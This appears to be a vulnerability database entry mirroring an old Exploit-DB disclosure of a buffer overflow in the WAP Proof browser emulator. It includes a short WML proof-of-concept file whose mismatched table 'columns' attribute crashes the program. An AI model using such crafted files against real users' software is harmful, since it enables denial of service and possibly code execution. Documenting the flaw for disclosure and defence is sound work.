WAP Proof Universal Emulator Vulnerability

vendor:

Universal Emulator

by:

Orion Einfold

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Universal Emulator

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows

2009

WAP Proof Universal Emulator Vulnerability

The vulnerability exists due to a boundary error when handling the 'columns' attribute of the <table> element. By manipulating the 'columns' attribute, an attacker can cause a buffer overflow, resulting in a denial of service or the execution of arbitrary code.

Mitigation:

No known mitigation

Source

Exploit-DB raw data:

[] Description : 

WAP Proof is an universal emulator of a WAP browser for Microsoft Windows. It is designed for the preview and debugging of mobile websites and provide support for WML, XHTML, cHTML and HTML pages and a compatible GSM modems, such as Wavecom, Alcatel, Motorola, Nokia, Siemens, Sagem, Sony Ericsson .. etc.
Vendor Homepage: http://www.wap-proof.com/

[] Technical details:

The <td> and <tr> tags defines a table row or a standard cell in a HTML table alongwith the column="" attribute in the <table> element
and any incorrect integer value for column attribute that not fitt for the enumeration of tags may usually cause to crash the browser.



[] POC to /bug.wml:


<?xml version="1.0" encoding="utf-8"?> 

<wml><card id="orion" title="einfold">
<p><table title="Tab" columns="1" align="LCR" class="AAA" id="AAA">
<tr><td>one</td><td>two</td><td>three</td></tr>
</table></p></card></wml> 

<!-- Orion Einfold -->